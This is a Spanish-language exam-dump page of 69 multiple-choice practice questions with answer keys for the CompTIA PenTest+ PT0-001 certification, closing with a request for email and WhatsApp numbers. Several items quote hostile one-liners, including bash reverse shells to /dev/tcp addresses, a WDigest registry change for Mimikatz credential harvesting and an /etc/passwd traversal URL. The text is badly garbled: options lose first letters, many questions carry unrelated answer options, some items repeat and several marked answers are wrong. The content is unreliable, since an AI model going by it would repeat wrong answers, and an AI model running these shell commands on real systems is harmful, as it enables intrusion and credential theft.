¿NO QUIERES PERDERTE NADA?

Consejos para aprobar el examen de certificación

Últimas noticias sobre exámenes e información sobre descuentos.

Curado y actualizado por nuestros expertos.

Sí, envíame el boletín.

CompTIA PenTest+ PT0-001 Exam Dumps - Su camino al éxito

Prepararse para el examen CompTIA PenTest+ PT0-001 con preguntas de práctica y materiales de estudio de alta calidad es crucial para aprobar con éxito. Utilizar recursos de examen confiables que reflejen con exactitud el entorno del examen real puede ayudar a identificar las áreas que necesitan estudio adicional. Los exámenes de prueba que simulan el formato y el nivel de dificultad del examen real le permiten evaluar su preparación. Las preguntas y respuestas de examen bien elaboradas cubren varios temas de pruebas de penetración y gestión de vulnerabilidades, lo que le permite reforzar sus conocimientos. Además, la utilización de guías de estudio y pruebas de práctica de proveedores acreditados puede garantizar que te centres en el contenido relevante y actualizado del examen. Al prepararse adecuadamente con recursos integrales de preparación para el examen, aumenta sus posibilidades de abordar con confianza el examen de certificación CompTIA PenTest+ PT0-001.
Realizar otros exámenes en línea

Cuestionar #1
Un evaluador de penetración revisa los resultados del análisis de una aplicación web. ¿Cuál de las siguientes vulnerabilidades es la MÁS crítica y debería priorizarse para su explotación?
A. SS almacenado
B. evelación de la ruta de llenado
C. ertificado caducado
D. Secuestro de clics
Ver respuesta
Respuesta correcta: A
Cuestionar #2
Durante una prueba de penetración en una red interna, un evaluador recupera el hash de la contraseña NTLM de un usuario que se sabe que tiene privilegios completos de administrador en varios sistemas objetivo. Los esfuerzos para descifrar el hash y recuperar la contraseña en texto plano no han tenido éxito. ¿Cuál de los siguientes sería el MEJOR objetivo para continuar con los esfuerzos de explotación?
A. Sistema operativo: Windows 7 Puertos abiertos: 23, 161
B. Sistema operativo: Windows Server 2016 Puertos abiertos: 53, 5900
C. Sistema operativo: Windows 8
D. Sistema operativo: Windows 8 Puertos abiertos: 514, 3389
Ver respuesta
Respuesta correcta: C
Cuestionar #3
Un probador de penetración es capaz de moverse lateralmente a través de un dominio con obstáculos mínimos después de comprometer una sola estación de trabajo. ¿Cuál de las siguientes estrategias de mitigación sería la MEJOR para recomendar en el informe? (Seleccione TRES).
A. taque de volcado de credenciales
B. taque de inyección DLL
C. taque de concha inversa
D. asar el ataque hash
Ver respuesta
Respuesta correcta: CDE
Cuestionar #4
Durante una prueba de penetración interna, se observan varias solicitudes de resolución de nombres de multidifusión y difusión que atraviesan la red. ¿Cuál de las siguientes herramientas podría utilizarse para suplantar recursos de red y recopilar solicitudes de autenticación?
A. ttercap
B. cpdump
C. esponder
D. Medusa
Ver respuesta
Respuesta correcta: C
Cuestionar #5
Un desarrollador de software quiere probar el código de una aplicación en busca de vulnerabilidades. ¿Cuál de los siguientes procesos debe realizar el desarrollador de software?
A. xploración de vulnerabilidades
B. xploración dinámica
C. xploración estática
D. Escaneado de conformidad
Ver respuesta
Respuesta correcta: A
Cuestionar #6
Durante una prueba de penetración, un evaluador ejecuta una campaña de phishing y recibe un shell de un PC interno que ejecuta el sistema operativo Windows 10. El evaluador desea realizar la recolección de credenciales con Mimikatz. Cuál de los siguientes cambios en el registro permitiría el almacenamiento en caché de credenciales en la memoria?
A. eg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 0
B. eg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
C. eg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
D. eg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
Ver respuesta
Respuesta correcta: A
Cuestionar #7
Un probador de penetración se le ha pedido para llevar a cabo una prueba de penetración en un servicio web basado en REST. ¿Cuál de los siguientes elementos es necesario?
A. Los últimos resultados del análisis de vulnerabilidades
B. Lista de ejemplos de solicitudes
C. na lista actualizada de posibles exploits
D. Una lista de cuentas de prueba de muestra
Ver respuesta
Respuesta correcta: B
Cuestionar #8
Un probador de penetración ejecuta los siguientes comandos:¿Cuál de los siguientes es una vulnerabilidad de host local que el atacante está explotando?
A. ermisos de archivo inseguros
B. Listas blancas de aplicaciones
C. Escape de la cáscara
D. Servicio grabable
Ver respuesta
Respuesta correcta: A
Cuestionar #9
Un probador de penetración está escaneando una red para SSH y tiene una lista de objetivos proporcionados. Cuál de los siguientes comandos de Nmap debería utilizar?
A. nmap -p 22 -iL objetivos
B. nmap -p 22 -sL objetivos
C. nmap -p 22 -oG objetivos
D. nmap -p 22 -oA objetivos
Ver respuesta
Respuesta correcta: A
Cuestionar #10
Un ingeniero, que está llevando a cabo una prueba de penetración para una aplicación web, descubre que el proceso de inicio de sesión de usuario envía de datos de campo utilizando el método HTTP GET. Para mitigar el riesgo de exponer información sensible, el formulario debe enviarse utilizando un método:
A. étodo HTTP POST
B. étodo HTTP OPTIONS
C. étodo HTTP PUT
D. étodo HTTP TRACE
Ver respuesta
Respuesta correcta: A
Cuestionar #11
Un analista de seguridad ha descubierto una petición sospechosa en los registros de una aplicación web. Dada la siguiente URL:http:www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswdWhich, ¿es MÁS probable que la vulnerabilidad sea uno de los siguientes tipos de ataque?
A. Ampliación del ámbito de aplicación
B. evisión post mortem
C. ceptación del riesgo
D. Prevención de amenazas
Ver respuesta
Respuesta correcta: B
Cuestionar #12
Un atacante utiliza SET para realizar una copia del portal de correo web alojado en la nube de una empresa y envía un correo electrónico con la esperanza de que el Director Ejecutivo (CEO) inicie sesión para obtener las credenciales de inicio de sesión del CEO. ¿De cuál de los siguientes tipos de ataque es un ejemplo?
A. taque de elicitación
B. Ataque de suplantación de identidad
C. Ataque Spear phishing
D. Ataque "drive-by download
Ver respuesta
Respuesta correcta: A
Cuestionar #13
Durante la fase de recopilación de información de una prueba de penetración en la red para el dominio corp.local, ¿cuál de los siguientes comandos proporcionaría una lista de controladores de dominio?
A. slookup -type=srv _ldap
B. map -sV -p 389 - -script=ldap-rootdse corp
C. et grupo "Controladores de dominio" /dominio
D. presult /d corp
Ver respuesta
Respuesta correcta: A
Cuestionar #14
Una empresa contrata a un probador de penetración para determinar si hay alguna vulnerabilidad en su nueva instalación de concentrador VPN con una IP externa de 100.170.60.5. Cuál de los siguientes comandos probará si la VPN está disponible?
A. pipe
B. ke-scan -A -t 1 --sourceip=spoof_ip 100
C. map -sS -A -f 100
D. c 100
Ver respuesta
Respuesta correcta: B
Cuestionar #15
Haga clic en el botón exhibir. Un evaluador de penetración está realizando una evaluación cuando el administrador de red le muestra una muestra de paquete que está causando problemas en la red. ¿Cuál de los siguientes tipos de ataques debería detener el evaluador?
A. NMP fuerza bruta
B. Suplantación de ARP
C. Envenenamiento de la caché DNS
D. Retransmisión SMTP
Ver respuesta
Respuesta correcta: A
Cuestionar #16
Joe, un atacante, pretende transferir fondos discretamente de la cuenta de una víctima a la suya propia. ¿Cuál de las siguientes URL puede utilizar para llevar a cabo este ataque?
A. ttps://testbank
B. ttps://testbank
C. ttps://testbank
D. ttps://testbank
Ver respuesta
Respuesta correcta: B
Cuestionar #17
Si un consultor de seguridad se encuentra con un hash de contraseña parecido al siguiente: b117525b345470c29ca3d8ae0b556ba8¿Cuál de los siguientes formatos es el tipo de hash correcto?
A. Kerberos
B. NetNTLMv1
C. NTLM
D. SHA-1
Ver respuesta
Respuesta correcta: D
Cuestionar #18
Un probador de penetración quiere comprobar manualmente si existe una vulnerabilidad "fantasma" en un sistema. Cuál de los siguientes métodos es el correcto para validar la vulnerabilidad?
A. escargue el archivo GHOST en un sistema Linux y compilegcc -o GHOSTtest i:
B. escargue el archivo GHOST a un sistema Windows y compilegcc -o GHOST GHOST
C. escargue el archivo GHOST a un sistema Linux y compilegcc -o GHOST GHOST
D. escargue el archivo GHOST a un sistema Windows y compilegcc -o GHOSTtest i:
Ver respuesta
Respuesta correcta: C
Cuestionar #19
Durante una prueba de penetración de una aplicación web, un evaluador de penetración observa que falta el encabezado de la política de seguridad de contenidos. Cuál de las siguientes técnicas realizaría con MAYOR probabilidad?
A. taque de inyección de comandos
B. taque de clickjacking
C. Ataque a través de directorios
D. Ataque remoto de inclusión de ficheros
Ver respuesta
Respuesta correcta: B
Cuestionar #20
Durante la post-explotación, un probador identifica que sólo los binarios del sistema pasarán un filtro de salida y almacenarán un archivo con el siguiente comando:c: \creditcards.db>c:\winit\system32\calc.exe:creditcards.db¿De cuál de las siguientes vulnerabilidades del sistema de archivos se aprovecha este comando?
A. istema de archivos jerárquico
B. lujos de datos alternativos
C. Éxito de la puerta trasera
D. istema de archivos extendido
Ver respuesta
Respuesta correcta: B
Cuestionar #21
Un probador de penetración está escaneando una red para SSH y tiene una lista de objetivos proporcionados. Cuál de los siguientes comandos de Nmap debería utilizar?
A. map -p 22 -iL objetivos
B. map -p 22 -sL objetivos
C. map -p 22 -oG objetivos
D. map -p 22 -oA objetivos
Ver respuesta
Respuesta correcta: A
Cuestionar #22
Un probador de penetración está comprobando un script para determinar por qué persisten algunos errores matemáticos básicos. Dado el resultado de la consola anterior, ¿cuál de las siguientes opciones explica cómo corregir los errores en el script? (Elija dos.)
A. OW
B. DA
C. LUF
D. PA
Ver respuesta
Respuesta correcta: BD
Cuestionar #23
Al intentar mantener la persistencia en un sistema Windows con privilegios limitados, ¿cuál de las siguientes claves de registro debe utilizar el probador?
A. KEY_CLASSES_ROOT
B. KEY_LOCAL_MACHINE
C. KEY_CURRENT_USER
D. KEY_CURRENT_CONFIG
Ver respuesta
Respuesta correcta: C
Cuestionar #24
¿Cuál de las siguientes herramientas utilizaría un probador de penetración para llevar a cabo OSINT? (Seleccione DOS).
A. irección MAC del cliente
B. irección MAC del controlador de dominio
C. irección MAC del servidor web
D. irección MAC de la puerta de enlace
Ver respuesta
Respuesta correcta: AE
Cuestionar #25
Un probador de penetración quiere lanzar una ventana de consola gráfica desde un host comprometido remotamente con IP 10.0.0.20 y mostrar el terminal en el ordenador local con IP 192.168.1.10. ¿Cuál de las siguientes opciones realizaría esta tarea?
A. esde el ordenador remoto, ejecute los siguientes comandos:export XHOST 192
B. esde el ordenador local, ejecute el siguiente comando:ssh -L4444:127
C. esde el ordenador remoto, ejecute el siguiente comando:ssh -R6000:127
D. esde el ordenador local, ejecute el siguiente comando:nc -l -p 6000Después, desde el ordenador remoto, ejecute el siguiente comando:xterm | nc 192
Ver respuesta
Respuesta correcta: A
Cuestionar #26
¿Cuál de las siguientes opciones sería la MEJOR para realizar un reconocimiento pasivo del dominio externo de un objetivo?
A. elocotón
B. eWL
C. penVAS
D. Shodan
Ver respuesta
Respuesta correcta: D
Cuestionar #27
¿Cuál de los siguientes es un ejemplo de ataque de spear phishing?
A. jemplos de mensajes SOAP
B. a documentación de la API REST
C. Una utilidad de comprobación de protocolos
D. Un archivo XSD aplicable
Ver respuesta
Respuesta correcta: A
Cuestionar #28
¿Cuál de las siguientes opciones explica MEJOR por qué es importante mantener la confidencialidad de cualquier hallazgo identificado al realizar una prueba de penetración?
A. Los resultados de las pruebas de penetración suelen contener propiedad intelectual de la empresa
B. Los resultados de las pruebas de penetración podrían provocar la insatisfacción de los consumidores si se hacen públicos
C. os resultados de las pruebas de penetración son documentos legales que contienen información privilegiadA
D. Los resultados de las pruebas de penetración pueden ayudar a un atacante a comprometer un sistemA
Ver respuesta
Respuesta correcta: D
Cuestionar #29
Durante una evaluación de seguridad completa, ¿cuál de los siguientes es un requisito previo para aplicar ingeniería social a un objetivo mediante el contacto físico con él?
A. ocalización de las salidas de emergencia
B. reparar un pretexto
C. urfear con el hombro a la víctima
D. Seguir a la víctima
Ver respuesta
Respuesta correcta: B
Cuestionar #30
Una empresa planificó y consiguió el presupuesto para contratar a un consultor que realizara una prueba de penetración en una aplicación web. Tras descubrir las vulnerabilidades, la empresa pidió al consultor que realizara las siguientes tareas:-Revisión del código-Actualización de la configuración del cortafuegos¿Cuál de las siguientes situaciones se ha producido en esta situación?
A. numeración de los servicios
B. ecopilación OSINT
C. Exploración de puertos
D. Ingeniería social
Ver respuesta
Respuesta correcta: A
Cuestionar #31
Un probador de penetración ejecutó el siguiente escaneo Nmap en un ordenador:nmap -aV 192.168.1.5La organización dijo que había deshabilitado Telnet de su entorno. Sin embargo, los resultados del escaneo Nmap muestran el puerto 22 cerrado y el puerto 23 abierto a SSH. ¿Cuál de las siguientes es la MEJOR explicación para lo sucedido?
A. a organización falló al deshabilitar Telnet
B. os resultados de Nmap contienen un falso positivo para el puerto 23
C. El puerto 22 fue filtrado
D. El servicio se está ejecutando en un puerto no estándar
Ver respuesta
Respuesta correcta: A
Cuestionar #32
¿Cuál de las siguientes propiedades del acuerdo de compromiso de pruebas de penetración tendrá el MAYOR impacto en la observación y prueba de sistemas de producción en sus cargas más altas?
A. reación de un ámbito de los sistemas de producción críticos
B. stablecer un horario de acceso a las pruebas
C. stablecer un compromiso de pruebas de caja blanca
D. Hacer que la dirección apruebe las pruebas intrusivas
Ver respuesta
Respuesta correcta: B
Cuestionar #33
Un probador de penetración ha desplegado con éxito un gemelo malvado y está empezando a ver algo de tráfico de la víctima. El siguiente paso que quiere dar es capturar todo el tráfico web de la víctima sin cifrar. ¿Cuál de las siguientes opciones sería la MEJOR para alcanzar este objetivo?
A. ealizar un ataque de downgrade HTTP
B. Recoger las credenciales de usuario para descifrar el tráfico
C. ealizar un ataque MITM
D. mplementar un ataque CA suplantando CAs de confianzA
Ver respuesta
Respuesta correcta: A
Cuestionar #34
¿Cuál de las siguientes opciones es la que MEJOR describe algunos puntos débiles significativos en la seguridad de un ICS, como los que se utilizan en instalaciones de suministro eléctrico, instalaciones de gas natural, presas e instalaciones nucleares?
A. os proveedores de ICS tardan en implantar controles de seguridad adecuados
B. l personal del ICS no está adecuadamente formado para realizar las tareas básicas
C. ay escasez de equipos de sustitución para dispositivos críticos
D. ay una falta de cumplimiento para las instalaciones ICS
Ver respuesta
Respuesta correcta: B
Cuestionar #35
Un evaluador de penetración ha realizado un análisis de vulnerabilidades de un host específico que contiene una valiosa base de datos y ha identificado las siguientes vulnerabilidades:-XSS-Método HTTP DELETE permitido-Inyección SQL-Vulnerable a CSRFT¿A cuál de las siguientes debe dar el evaluador la MAYOR prioridad?
A. nyección SQL
B. étodo HTTP DELETE permitido
C. ulnerable a CSRF
D. SS
Ver respuesta
Respuesta correcta: B
Cuestionar #36
Un probador de penetración quiere crear un script para descubrir todos los registros RPTR para un rango de direcciones IP. Cuál de las siguientes opciones es la MÁS eficiente?
A. map -p 53 -oG dnslist
B. slookup -ns 8
C. or x in {1
D. ig -r > echo "8
Ver respuesta
Respuesta correcta: A
Cuestionar #37
Dado lo siguiente:http://example.com/download.php?id-.../.../.../etc/passwdWhich de las siguientes opciones describe MEJOR el ataque anterior?
A. taque de carga de archivos maliciosos
B. Ataque de redirección
C. Ataque a través de directorios
D. taque inseguro de referencia directa al objeto
Ver respuesta
Respuesta correcta: C
Cuestionar #38
Durante una evaluación de una aplicación web, un evaluador de penetración descubre que se pueden ejecutar comandos arbitrarios en el servidor. Queriendo llevar este ataque un paso más allá, el probador de penetración comienza a explorar formas de obtener un shell inverso de vuelta a la máquina atacante en 192.168.1.5. ¿Cuáles de las siguientes son posibles formas de hacerlo? (Seleccione DOS).
A. os fabricantes que desarrollan dispositivos IoT se preocupan menos por la seguridad
B. A los administradores les resulta difícil aplicar las mismas normas de seguridad en todos los ámbitos
C. os sistemas IoT suelen carecer de la potencia de hardware que requieren las soluciones más seguras
D. Las autoridades reguladoras suelen imponer menores requisitos de seguridad a los sistemas IoT
Ver respuesta
Respuesta correcta: BC
Cuestionar #39
¿Por cuál de las siguientes razones necesita un evaluador de penetración disponer en todo momento de la información del punto de contacto de un cliente? (Elija tres.)
A. SASS
B. ase de datos SAM
C. Directorio activo
D. Registro
Ver respuesta
Respuesta correcta: ACF
Cuestionar #40
Un probador de penetración ha comprometido un servidor Windows y está tratando de lograr la persistencia. Cuál de las siguientes opciones lograría ese objetivo?
A. chtasks
B. et session server | dsquery -user | net use c$
C. owershell && set-executionpolicy unrestricted
D. eg guardar HKLM\System\CurrentControlSet\Services\Sv
Ver respuesta
Respuesta correcta: D
Cuestionar #41
Un evaluador de intrusiones está redactando un informe que describe el nivel general de riesgo para las operaciones. En cuál de las siguientes áreas del informe debería ponerlo?
A. scalar privilegios horizontalmente
B. aspar la página en busca de campos ocultos
C. nalizar el código de respuesta HTTP
D. Buscar encabezados HTTP
Ver respuesta
Respuesta correcta: B
Cuestionar #42
¿En cuál de los siguientes componentes es MÁS probable que una vulnerabilidad explotada afecte a varios contenedores de aplicaciones en ejecución a la vez?
A. ibliotecas comunes
B. rchivos de configuración
C. Escape de la caja de arena
D. ypass ASLR
Ver respuesta
Respuesta correcta: A
Cuestionar #43
Una empresa solicitó a un probador de penetración que revisara la seguridad de una aplicación Android desarrollada internamente. El probador de penetración recibió un archivo APK para apoyar la evaluación. El evaluador quiere ejecutar SAST en el archivo APK. ¿Cuál de los siguientes pasos preparatorios debe realizar PRIMERO el evaluador de penetración? (Seleccione DOS).
A. l software obsoleto puede contener componentes explotables
B. ueden emplearse prácticas deficientes de gestión de contraseñas
C. Los protocolos criptográficamente débiles pueden ser interceptados
D. as configuraciones del servidor web pueden revelar información sensible
Ver respuesta
Respuesta correcta: AB
Cuestionar #44
Un evaluador de penetración está revisando la siguiente salida de un sniffer inalámbrico: ¿Cuál de las siguientes opciones se puede extrapolar de la información anterior?
A. rincipio del miedo
B. rincipio de autoridad
C. rincipio de escasez
D. rincipio de semejanza
E. rincipio de la prueba social
Ver respuesta
Respuesta correcta: C
Cuestionar #45
Un probador de penetración ejecuta lo siguiente desde un ordenador comprometido 'python -c 'import pty;pty.spawn ("/bin/bash") '.¿Cuál de las siguientes acciones está realizando el probador?
A. liminar el historial de Bash
B. ctualización del shell
C. reación de un sandbox
D. aptura de credenciales
Ver respuesta
Respuesta correcta: B
Cuestionar #46
Un cliente solicita que un probador de penetración emule a un técnico de help desk que ha sido despedido recientemente. Cuál de las siguientes opciones describe MEJOR las capacidades del actor de la amenaza?
A. menaza persistente avanzada
B. uión infantil
C. acktivista
D. Crimen organizado
Ver respuesta
Respuesta correcta: B
Cuestionar #47
Un correo electrónico enviado por el Director General (CEO) al Director Financiero (CFO) indica que se necesita una transferencia bancaria para pagar a un nuevo proveedor. Ninguno de los dos conoce al proveedor y el director general niega haber enviado el correo electrónico
A. Modificar la configuración de cifrado del servidor web para utilizar un paquete de cifrado más potente para el cifrado, el hash y la firma digital
B. mplantar una nueva formación para ser conscientes de los riesgos de acceder a la aplicación
C. mplementar una ACL para restringir el acceso a la aplicación exclusivamente al departamento financiero
D. Requerir a los usuarios de nómina que cambien las contraseñas utilizadas para autenticarse en la aplicación
Ver respuesta
Respuesta correcta: B
Cuestionar #48
Un probador pretende ejecutar el siguiente comando en un sistema de destino:bash -i >& /dev/tcp/10.2.4.6/443 0> &1¿Cuál de los siguientes comandos adicionales debería ejecutarse en el sistema Linux del probador para que el comando anterior tuviera éxito?
A. c -nlvp 443
B. c 10
C. c -w3 10
D. c -e /bin/sh 10
Ver respuesta
Respuesta correcta: D
Cuestionar #49
Un consultor de seguridad recibe un documento en el que se describe el alcance de una próxima prueba de penetración. Este documento contiene direcciones IP y las horas en que cada una puede ser escaneada. ¿Cuál de los siguientes documentos contendría esta información?
A. Normas de intervención
B. Solicitud de propuesta
C. ontrato marco de servicios
D. Análisis del impacto empresarial
Ver respuesta
Respuesta correcta: A
Cuestionar #50
El siguiente comando se ejecuta en un sistema de archivos Linux:chmod 4111 /usr/bin/sudo¿Cuál de los siguientes problemas puede ser explotado ahora?
A. Vulnerabilidades del núcleo
B. rozos pegajosos
C. uta de servicio no cotizada
D. Sudo mal configurado
Ver respuesta
Respuesta correcta: B
Cuestionar #51
Si un consultor de seguridad se encuentra con un hash de contraseña parecido al siguiente: b117525b345470c29ca3d8ae0b556ba8¿Cuál de los siguientes formatos es el tipo de hash correcto?
A. erberos
B. etNTLMv1
C. TLM
D. HA-1
Ver respuesta
Respuesta correcta: D
Cuestionar #52
Se encontró la siguiente línea en el archivo de historial de una máquina explotada. Un atacante ejecutó el siguiente comando:bash -i >& /dev/tcp/192.168.0.1/80 0> &1¿Cuál de las siguientes opciones describe lo que hace el comando?
A. Ganzúas
B. ctivación del sensor de salida
C. ock bumping
D. Bloqueo de derivación
Ver respuesta
Respuesta correcta: C
Cuestionar #53
Un vigilante de seguridad observa a una persona que entra en el edificio tras escanear una tarjeta de identificación. El vigilante de seguridad comprueba el sistema de tarjetas y encuentra dos entradas de registro para la tarjeta en cuestión en los últimos 30 minutos. ¿Cuál de las siguientes situaciones es la MÁS probable?
A. La placa fue clonadA
B. El servidor de control de acceso físico no funciona correctamente
C. El sistema alcanzó la tasa de error de cruce
D. El empleado perdió la placA
Ver respuesta
Respuesta correcta: A
Cuestionar #54
Un probador de penetración se está preparando para realizar pruebas de API. Cuál de las siguientes opciones sería la MÁS útil para prepararse para esta tarea?
A. Nikto
B. GUERRA
C. W3AF
D. Swagger
Ver respuesta
Respuesta correcta: D
Cuestionar #55
Un probador de penetración tiene un shell completo a un controlador de dominio y quiere descubrir cualquier cuenta de usuario que no se ha autenticado en el dominio en 21 días. ¿Cuál de los siguientes comandos es el MEJOR para lograrlo?
A. dsrm -users ?€DN=empresA
B. dsuser -nombre -cuenta -limite 3
C. dsquery usuario -inactivo 3
D. dsquery -o -rdn -limit 21
Ver respuesta
Respuesta correcta: D
Cuestionar #56
En un escenario de prueba de penetración física, el probador de penetración obtiene acceso físico a un ordenador portátil. El portátil está conectado pero bloqueado. ¿Cuál de los siguientes es un posible SIGUIENTE paso para extraer las credenciales del dispositivo?
A. uerza bruta la contraseña del usuario
B. ealizar un ataque ARP spoofing
C. provechar el marco BeEF para capturar credenciales
D. levar a cabo el envenenamiento LLMNR/NETBIOS-ns
Ver respuesta
Respuesta correcta: A
Cuestionar #57
En un escenario de prueba de penetración física, el probador de penetración obtiene acceso físico a un ordenador portátil. El portátil está conectado pero bloqueado. ¿Cuál de los siguientes es un posible SIGUIENTE paso para extraer las credenciales del dispositivo?
A. Fuerza bruta la contraseña del usuario
B. Realizar un ataque ARP spoofing
C. Aprovechar el marco BeEF para capturar credenciales
D. Llevar a cabo el envenenamiento LLMNR/NETBIOS-ns
Ver respuesta
Respuesta correcta: A
Cuestionar #58
Un probador de penetración compromete un sistema que tiene acceso de red sin restricciones a través del puerto 443 a cualquier host. El investigador quiere crear un shell inverso desde la víctima hasta el atacante. ¿Cuál de los siguientes métodos utilizaría con MAYOR probabilidad?
A. erl -e 'use SOCKET'; $i='; $p='443;
B. sh superadmin@-p 443
C. c -e /bin/sh443
D. ash -i >& /dev/tcp//443 0>&1
Ver respuesta
Respuesta correcta: D
Cuestionar #59
¿Cuál de las siguientes es la razón por la que una persona que realiza pruebas de penetración ejecutaría el comando chkconfig --del servicename al final de una intervención?
A. rpspoof
B. map
C. esponder
D. urpsuite
Ver respuesta
Respuesta correcta: A
Cuestionar #60
¿Cuál de las siguientes situaciones haría que un evaluador de penetración se comunicara con el propietario/cliente de un sistema durante el transcurso de una prueba? (Seleccione DOS.)
A. plique controles compensatorios sencillos para las vulnerabilidades críticas con el fin de minimizar el riesgo y, a continuación, vuelva a priorizar la corrección
B. Identifique los problemas que pueden solucionarse más rápidamente y resuélvalos en primer lugar
C. Aplicar primero las medidas correctoras de las vulnerabilidades críticas con menor impacto y, a continuación, abordar las demás vulnerabilidades críticas
D. Arreglar primero la vulnerabilidad más crítica, incluso si eso significa que arreglar las otras vulnerabilidades puede llevar mucho tiempo
Ver respuesta
Respuesta correcta: BD
Cuestionar #61
HOTSPOInstrucciones:Dadas las siguientes firmas de ataque, determine el tipo de ataque y, a continuación, identifique la solución asociada para evitar el ataque en el futuro.Si en algún momento desea volver al estado inicial de la simulación, haga clic en el botón Restablecer todo.Usted es un analista de seguridad encargado de reforzar un servidor web.Se le ha dado una lista de cargas útiles HTTP que fueron marcadas como maliciosas.Área caliente:
A. Consulte la respuesta en la sección Explicación
Ver respuesta
Respuesta correcta: A
Cuestionar #62
Un guardia de seguridad observa a una persona que entra en el edificio tras escanear su tarjeta de identificación. La instalación tiene un estricto requisito de entrada y salida de tarjetas de identificación con un torniquete. A continuación, el guardia de seguridad audita el sistema de tarjetas de identificación y encuentra dos entradas de registro para la tarjeta en cuestión en los últimos 30 minutos. ¿Cuál de las siguientes situaciones es la MÁS probable?
A. La placa fue clonadA
B. l servidor de control de acceso físico no funciona correctamente
C. l sistema alcanzó la tasa de error de cruce
D. l empleado perdió la placA
Ver respuesta
Respuesta correcta: A
Cuestionar #63
¿Cuál de los siguientes comandos permitiría a un probador de penetración acceder a una red privada desde Internet en Metasploit?
A. et rhost 192
B. jecutar autoroute -s 192
C. b_nmap -iL /tmp/privatehosts
D. se auxiliary/server/socks4a
Ver respuesta
Respuesta correcta: A
Cuestionar #64
¿Cuál de las siguientes es la finalidad de un acuerdo de confidencialidad?
A. stablece las condiciones de confidencialidad entre ambas partes
B. escribe los límites de los sistemas autorizados para las pruebas
C. eñala los requisitos de las pruebas técnicas que se permiten
D. sboza la configuración detallada de la red
Ver respuesta
Respuesta correcta: A
Cuestionar #65
Un probador de penetración, que no está en la red del cliente, está utilizando Nmap para escanear la red en busca de hosts que estén dentro del alcance. El probador de penetración no está recibiendo ninguna respuesta en el comando:nmap 100.100/1/0-125¿Cuál de los siguientes comandos sería el MEJOR para devolver resultados?
A. map -Pn -sT 100
B. map -sF -p 100
C. map -sV -oA salida 100
D. map 100
Ver respuesta
Respuesta correcta: A
Cuestionar #66
Dado el siguiente script de Python: ¿Cuál de los siguientes es el destino de la salida?
A. la pantalla
B. un servidor de red
C. un archivo
D. /dev/null
Ver respuesta
Respuesta correcta: C
Cuestionar #67
Un cliente está pidiendo a un probador de penetración que evalúe la disponibilidad de una nueva aplicación web. Cuál de los siguientes tipos de ataques debería utilizar el evaluador?
A. nundación SYN TCP
B. Inyección SQL
C. SS
D. scaneo XMAS
Ver respuesta
Respuesta correcta: B
Cuestionar #68
¿Cuál de las siguientes opciones sería la MEJOR para realizar un reconocimiento pasivo en el dominio externo de un objetivo?
A. Melocotón
B. CeWL
C. OpenVAS
D. Shodan
Ver respuesta
Respuesta correcta: D
Cuestionar #69
¿Cuál de los siguientes registros de la CPU debe sobrescribir el investigador para explotar un desbordamiento de búfer simple?
A. egistro de puntero de pila
B. egistro de puntero de índice
C. untero base de pila
D. egistro de índice de destino
Ver respuesta
Respuesta correcta: A

Ver respuestas después del envío

Envíe su correo electrónico y WhatsApp para obtener las respuestas a sus preguntas.

Nota: asegúrese de que su ID de correo electrónico y Whatsapp sean válidos para que pueda obtener los resultados correctos del examen.

Correo electrónico:
WhatsApp/número de teléfono: